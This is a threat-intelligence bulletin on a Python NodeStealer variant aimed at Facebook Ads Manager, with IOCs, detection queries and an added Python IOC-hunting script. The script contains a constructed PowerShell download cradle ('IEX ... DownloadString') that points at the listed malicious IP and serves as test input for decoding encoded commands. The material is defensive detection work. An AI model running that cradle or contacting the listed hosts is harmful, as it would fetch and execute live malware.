Python-Based NodeStealer Version Targets Facebook Ads Manager

    Date: 12/26/2024

    Severity: High 

    Summary

    NodeStealer, first seen as a JavaScript stealer, has been rewritten in Python, broadening the data it can steal. The variant described here was uncovered in a campaign against a Malaysian educational institution and is attributed to a Vietnamese threat group. It harvests browser data, credit card details, and Facebook Ads Manager account data that can be monetized. The infection starts with a spear-phishing email whose lure drops the malware disguised as a legitimate application; the chain uses DLL sideloading and encoded PowerShell commands to evade detection, and the stolen data is exfiltrated through Telegram.

    Indicators of Compromise (IOC) List

    Domains / URLs:

    https://t.ly/MRAbJ

    http://88.216.99.5:15707/entry.txt

    Hashes (SHA-256):

    f813da93eed9c536154a6da5f38462bfb4ed80c85dd117c3fd681cf4790fbf71
    
    1c9c7bb07acb9d612af2007cb633a6b1f569b197b1f93abc9bd3af8593e1ec66
    
    786db3ddf2a471516c832e44b0d9a230674630c6f99d3e61ada6830726172458

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    Domains / URLs:

    userdomainname like "https://t.ly/MRAbJ" or url like "https://t.ly/MRAbJ" or userdomainname like "http://88.216.99.5:15707/entry.txt" or url like "http://88.216.99.5:15707/entry.txt"

    Hashes (SHA-256):

    sha256hash IN ("f813da93eed9c536154a6da5f38462bfb4ed80c85dd117c3fd681cf4790fbf71","1c9c7bb07acb9d612af2007cb633a6b1f569b197b1f93abc9bd3af8593e1ec66","786db3ddf2a471516c832e44b0d9a230674630c6f99d3e61ada6830726172458")
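    The queries above are string matches; the added example below (written for this page, not code from Gurucul or Trend Micro) hunts the same IOCs in raw log records while handling two things a plain `like` match misses: URLs whose host is logged in a different case, and a URL that only appears inside the base64/UTF-16LE payload of a PowerShell `-EncodedCommand` argument, which is how the summary's "encoded PowerShell commands" typically surface in process-creation telemetry. The log lines and the PowerShell script body are constructed for illustration; only the URLs and hashes come from the IOC list.

```python
"""Added example: hunt the bulletin's NodeStealer IOCs in log records, including
inside base64-encoded PowerShell command lines. Sample records are constructed."""
import base64
import re
from typing import Optional
from urllib.parse import urlsplit

# IOCs quoted from the bulletin above.
IOC_URLS = {
    "https://t.ly/MRAbJ",
    "http://88.216.99.5:15707/entry.txt",
}
IOC_SHA256 = {
    "f813da93eed9c536154a6da5f38462bfb4ed80c85dd117c3fd681cf4790fbf71",
    "1c9c7bb07acb9d612af2007cb633a6b1f569b197b1f93abc9bd3af8593e1ec66",
    "786db3ddf2a471516c832e44b0d9a230674630c6f99d3e61ada6830726172458",
}


def normalize_url(url: str) -> str:
    """Lower-case scheme and host (port kept), keep the path as-is: the path of a
    shortener link such as t.ly/MRAbJ is case-sensitive, the host is not."""
    p = urlsplit(url.strip())
    return f"{p.scheme.lower()}://{p.netloc.lower()}{p.path}"


IOC_URLS_NORM = {normalize_url(u) for u in IOC_URLS}

URL_RE = re.compile(r"https?://[^\s'\"<>]+")
SHA256_RE = re.compile(r"\b[0-9a-fA-F]{64}\b")
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_powershell(cmdline: str) -> Optional[str]:
    """-EncodedCommand carries UTF-16LE script text, base64-encoded."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def find_iocs(record: str) -> set:
    """Return the normalized IOC URLs / lower-case hashes found in one record,
    scanning both the raw text and any decoded PowerShell payload."""
    texts = [record]
    decoded = decode_encoded_powershell(record)
    if decoded:
        texts.append(decoded)
    hits = set()
    for text in texts:
        for u in URL_RE.findall(text):
            if normalize_url(u) in IOC_URLS_NORM:
                hits.add(normalize_url(u))
        for h in SHA256_RE.findall(text):
            if h.lower() in IOC_SHA256:
                hits.add(h.lower())
    return hits


def hunt(records):
    """(index, hits) for every record that matched at least one IOC."""
    return [(i, find_iocs(r)) for i, r in enumerate(records) if find_iocs(r)]


# Constructed download cradle (hypothetical script body; URL from the IOC list).
CONSTRUCTED_SCRIPT = (
    "IEX (New-Object Net.WebClient).DownloadString"
    "('http://88.216.99.5:15707/entry.txt')"
)
ENCODED = base64.b64encode(CONSTRUCTED_SCRIPT.encode("utf-16-le")).decode()

SAMPLE_RECORDS = [
    # constructed proxy log line: host logged in upper case, shortener returns a redirect
    '2024-12-20T09:14:02Z proxy allow 10.0.3.17 GET "https://T.LY/MRAbJ" 302',
    # constructed process-creation event: URL only visible after decoding -enc
    "Image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine: powershell.exe -NoP -W Hidden -enc " + ENCODED,
    # constructed EDR file event: hash logged in upper case
    "FileCreate path=C:\\Users\\Public\\update.exe "
    "sha256=F813DA93EED9C536154A6DA5F38462BFB4ED80C85DD117C3FD681CF4790FBF71",
    # constructed benign line
    '2024-12-20T09:15:00Z proxy allow 10.0.3.17 GET "https://www.example.com/" 200',
]

if __name__ == "__main__":
    for idx, hits in hunt(SAMPLE_RECORDS):
        print(f"record {idx}: {sorted(hits)}")
```

    The t.ly link is a redirector, so matching it only catches the click, not the final payload host; resolve such links in a sandbox and add the destination to the hunt set rather than relying on the shortener alone.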

    Reference:   

    https://www.trendmicro.com/en_us/research/24/l/python-based-nodestealer.html 


    Tags

    Malaysia, NodeStealer, Facebook, Malware, Financial Services

